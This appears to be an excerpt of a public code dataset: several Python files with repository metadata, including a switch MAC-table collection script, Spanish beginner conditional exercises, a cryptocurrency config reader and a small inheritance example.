premium_rate=PhoneNumberDesc(national_number_pattern='82[09]\\d{5}', example_number='82012345', possible_length=(8,)),
shared_cost=PhoneNumberDesc(national_number_pattern='810(?:0[0-6]|[2-8]\\d)\\d{3}', example_number='81021234', possible_length=(8,)),
personal_number=PhoneNumberDesc(national_number_pattern='880\\d{5}', example_number='88012345', possible_length=(8,)),
voip=PhoneNumberDesc(national_number_pattern='85[0-5]\\d{5}', example_number='85012345', possible_length=(8,)),
uan=PhoneNumberDesc(national_number_pattern='(?:0\\d|81(?:0(?:0[7-9]|1\\d)|5\\d\\d))\\d{3}', example_number='01234', possible_length=(5, 8)),
voicemail=PhoneNumberDesc(national_number_pattern='81[23]\\d{5}', example_number='81212345', possible_length=(8,)),
leading_digits='79')
| [
"whitebirdinbluesky1990@gmail.com"
] | whitebirdinbluesky1990@gmail.com |
0b7613ed687f0eb0d89c213de50cb5dfaf7140cd | be4459658d667c47eefeeb3cf689a678042edb94 | /scripts/cloud/get_switch_known_macs.py | f796984baaffda0fb49ebb51e388f5873d9760cc | [
"Apache-2.0"
] | permissive | kparr/RIFT.ware-1 | 7945174aa23ac1f7d74a7464b645db5824982fc3 | 6846108d70b80b95c5117fdccd44ff058ac605be | refs/heads/master | 2021-01-13T08:36:03.751610 | 2016-07-24T21:36:15 | 2016-07-24T21:36:15 | 72,420,438 | 0 | 0 | null | 2016-10-31T09:11:27 | 2016-10-31T09:11:27 | null | UTF-8 | Python | false | false | 1,099 | py | #!/usr/bin/env python
#
# (c) Copyright RIFT.io, 2013-2016, All Rights Reserved
#
import subprocess
import re
import os
import sys
macs = dict()
cmds='''terminal length 0
show mac-address-table
q
'''
re1 = re.compile('\s*[0-9]+\s+([0-9a-f:]+)\s+Dynamic\s+Te\s+0/([0-9]+)\s+Active')
devnull = open(os.devnull, "w")
DEBUG = 'DEBUG' in sys.argv
for swnum in range(3):
sw = "f10-grunt%02d" % swnum
p = subprocess.Popen(["ssh", "-o", "StrictHostKeyChecking=no", "admin@%s" % sw ], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=devnull )
(stdout, stderr) = p.communicate(cmds)
# eliminate any ports that have more than 2 mac addresses
counts=[0 for m in range(64)]
for line in stdout.split('\n'):
m = re1.match(line)
if m is not None:
counts[int(m.group(2))] += 1
else:
if DEBUG: print line
for line in stdout.split('\n'):
m = re1.match(line)
if m is not None:
port = int(m.group(2))
if counts[port] < 3:
macs[m.group(1)] = sw
else:
if DEBUG: print 'skipping %s' % port
for mac, sw in macs.iteritems():
print "%s %s" % ( mac, sw)
| [
"Jeremy.Mordkoff@riftio.com"
] | Jeremy.Mordkoff@riftio.com |
ad0ed729ddbfca606c205b7712f4b6e4b02deb5d | 9083924b324cd31f1143f54effd46b2a0ea62664 | /Algoritmia/Semana2/Taller1.py | ceeefe4f52ac2f9274ed906d8cd8fd26ab47e637 | [] | no_license | dcardonac31/diplomado_comfenalco | ee0321d8bba4dd31780a22d26524bcb4d8fe28bf | ce51923b927130963750ede1aadd2d671859f12b | refs/heads/master | 2023-05-19T18:57:09.004508 | 2021-06-14T00:47:29 | 2021-06-14T00:47:29 | 372,342,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,804 | py | print(" EJERCICIOS CON DECISIONES LÓGICAS TALLER 1")
print("1. Elabore un algoritmo que permita averiguar cuál es el nombre del mayor de 2 hermanos no gemelos. Como datos de entrada se tiene el nombre y la edad de las 2 personas.")
nombre1 = input("Nombre hermano 1: ")
edad1 = int(input("Ingrese edad hermano 1: "))
nombre2 = input("Nombre hermano 2: ")
edad2 = int(input("Ingrese edad hermano 2: "))
nombreMayor = nombre1
if edad1 < edad2:
nombreMayor = nombre2
print(f"El hermano mayor es: {nombreMayor}")
print("---------------------------")
print("2. Elaborar un algoritmo que muestre un mensaje según la edad ingresada; niño (menor de 10 años), preadolescente (mayor o igual a 10años y menor o igual a 14 años), un adolescente (mayor o igual a 15 años y menor o igual a 18 años), adulto (mayor o igual a 19 años y menor o igual a 50 años), adulto mayor (mayor de 50 años).")
edad = int(input("Ingrese edad: "))
categoria = 'niño'
if edad >= 10 and edad < 15:
categoria = 'preadolescente'
elif edad >= 15 and edad < 19:
categoria = 'adolescente'
elif edad >= 19 and edad < 50:
categoria = 'adulto'
elif edad >= 50:
categoria = 'adulto mayor'
print(f"La persona es: {categoria}")
print("---------------------------")
print(" 3. Elabore un algoritmo que lea el nombre, el salario bruto, las deducciones y las bonificaciones de dos trabajadores, e imprima (escriba un mensaje) el nombre del que más salario neto tiene.")
nombre1 = input("Nombre empleado 1: ")
salario1 = float(input("Ingrese salario empleado 1: "))
deducciones1 = float(input("Ingrese deducciones empleado 1: "))
bonificaciones1 = float(input("Ingrese bonificaciones empleado 1: "))
salarioNeto1 = salario1 - deducciones1 + bonificaciones1
nombre2 = input("Nombre empleado 2: ")
salario2 = float(input("Ingrese salario empleado 2: "))
deducciones2 = float(input("Ingrese deducciones empleado 2: "))
bonificaciones2 = float(input("Ingrese bonificaciones empleado 2: "))
salarioNeto2 = salario2 - deducciones2 + bonificaciones2
nombreMayor = nombre1
if salarioNeto1 < salarioNeto2:
nombreMayor = nombre2
elif salarioNeto1 == salarioNeto2:
nombreMayor = 'Iguales'
print(f"El empleado con mejor salario es: {nombreMayor}")
print("---------------------------")
print(" 4. Crear un algoritmo que le permita al usuario ingresar los datos de dos buses así: Placa, El número de pasajeros transportado y el valor del pasaje, y el computador le muestre la placa del bus que más dinero recogió.")
placa1 = input("Placa 1: ")
numeroPasajeros1 = int(input("Ingrese numero pasajeros bus 1: "))
valorPasaje1 = int(input("Ingrese valor pasaje bus 1: "))
recaudoBus1 = numeroPasajeros1 * valorPasaje1
placa2 = input("Placa 2: ")
numeroPasajeros2 = int(input("Ingrese numero pasajeros bus 2: "))
valorPasaje2 = int(input("Ingrese valor pasaje bus 2: "))
recaudoBus2 = numeroPasajeros2 * valorPasaje2
placaMayor = placa1
if recaudoBus1 < recaudoBus2:
placaMayor = placa2
elif recaudoBus1 == recaudoBus2:
placaMayor = 'Iguales'
print(f"El bus con mayor recaudo es: {placaMayor}")
print("---------------------------")
print(" 5. Elaborar un algoritmo donde el usuario ingrese la placa de un bus, el número de pasajeros transportados y la ruta donde prestó el servicio (A o B) el computador le debe mostrar el dinero que recolectó sabiendo que en la ruta A el pasaje es a $1.200 y en la B a $1.000.")
placa = input("Placa: ")
numeroPasajeros = int(input("Ingrese numero pasajeros: "))
ruta = input("Ingrese ruta (A o B): ")
if ruta == 'A':
valorPasaje = 1200
else:
valorPasaje = 1000
recaudoBus = numeroPasajeros * valorPasaje
print(f"Valor recaudo : ${recaudoBus}")
print("---------------------------")
print(" 6. Crear un algoritmo que le permita al usuario ingresar el tipo de trabajador (FIJO o TEMPORAL) y con base en esto pueda imprimir el nombre y el salario neto, sabiendo que si es FIJO debe leer el nombre, el número de horas trabajadas, el salario básico hora, el total de deducciones y el total de bonificaciones y si es TEMPORAL solo debe leer el nombre y el número de horas trabajadas; estos trabajadores tienen un salario básico hora fijo de $6.000 y no tienen deducciones ni bonificaciones.")
tipoTrabajador = input("ingresar el tipo de trabajador (FIJO o TEMPORAL): ")
while tipoTrabajador != 'FIJO' or tipoTrabajador != 'TEMPORAL':
tipoTrabajador = input("ingresar el tipo de trabajador (FIJO o TEMPORAL): ")
tipoTrabajador = tipoTrabajador.upper()
if tipoTrabajador == 'FIJO':
nombre = input("Nombre empleado : ")
horasTrabajadas = int(input("Ingrese cantidad de horas trabajadas : "))
salarioBasicoPorHora = float(input("Ingrese salario basico por hora : $"))
deducciones = float(input("Ingrese deducciones: $"))
bonificaciones = float(input("Ingrese bonificaciones empleado : $"))
salarioNeto = (horasTrabajadas*salarioBasicoPorHora)-deducciones+bonificaciones
else:
nombre = input("Nombre empleado : ")
horasTrabajadas = int(input("Ingrese cantidad de horas trabajadas : "))
salarioBasicoPorHora = 6000
salarioNeto = (horasTrabajadas*salarioBasicoPorHora)
print(f"Salario Neto : ${salarioNeto}")
print("---------------------------")
print(" 7. Elaborar Un algoritmo que le permita al usuario leer 3 número diferentes entre sí y el computador le imprima el mayor de ellos.")
numero1 = int(input("Ingrese numero 1: "))
numero2 = int(input("Ingrese numero 1: "))
numero3 = int(input("Ingrese numero 1: "))
numeroMayor = numero1
if numero2 > numero1 and numero2 > numero3:
numeroMayor = numero2
elif numero3 > numero1 and numero3 > numero2:
numeroMayor = numero3
print(f"Numero mayor: {numeroMayor}")
print("---------------------------") | [
"david_ec10@hotmail.com"
] | david_ec10@hotmail.com |
a13567f0e3d8d8902392285c9731804607eddf86 | d8f25577efe8cef687ee4f0cd9a234f1e4b39e14 | /src/memorycoinrpc/config.py | 5435ab138e6b95ffafb0a04085ec5dcbf65aa6b3 | [
"MIT"
] | permissive | baby636/memorycoin-python | cf82f3fdc8699df30f982d8a42d8675af190b623 | 2b938a1be9dc360bba9d825fd3e9492d08fdddd2 | refs/heads/master | 2023-03-16T14:50:31.299150 | 2014-01-15T16:55:23 | 2014-01-15T16:55:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,352 | py | # Copyright (c) 2010 Witchspace <witchspace81@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""
Utilities for reading bitcoin configuration files.
"""
import os
def read_config_file(filename):
"""
Read a simple ``'='``-delimited config file.
Raises :const:`IOError` if unable to open file, or :const:`ValueError`
if an parse error occurs.
"""
f = open(filename)
try:
cfg = {}
for line in f:
line = line.strip()
if line and not line.startswith("#"):
try:
(key, value) = line.split('=', 1)
cfg[key] = value
except ValueError:
pass # Happens when line has no '=', ignore
finally:
f.close()
return cfg
def read_default_config(filename=None):
"""
Read bitcoin default configuration from the current user's home directory.
Arguments:
- `filename`: Path to a configuration file in a non-standard location (optional)
"""
if filename is None:
filename = os.path.expanduser("~/.memorycoin/memorycoin.conf")
elif filename.startswith("~"):
filename = os.path.expanduser(filename)
try:
return read_config_file(filename)
except (IOError, ValueError):
pass # Cannot read config file, ignore
| [
"mail@emreyilmaz.me"
] | mail@emreyilmaz.me |
09762017c24b5336f4c5d95f277192e6c1447cc1 | 03034837c5f10d19fcc4dc51388f056ec43fd1d2 | /ex8.py | 281eeca7a393efba92404cf62a6beb6b31e97edb | [] | no_license | shaukhk01/project01 | e95c19844757c631f7ffbdd910b20316f49a945b | 79cfe784612fdbb4816c9fc3fc7222c845a3268f | refs/heads/master | 2020-06-26T07:20:49.844532 | 2019-08-20T06:06:40 | 2019-08-20T06:06:40 | 199,569,813 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 193 | py | class P:
a = 10
def __init__(self):
self.b = 20
class C(P):
c = 30
def __init__(self):
super().__init__()
self.d = 40
obj = C()
print(obj.a,obj.d,obj.b)
| [
"shaukhk01@gmail.com"
] | shaukhk01@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.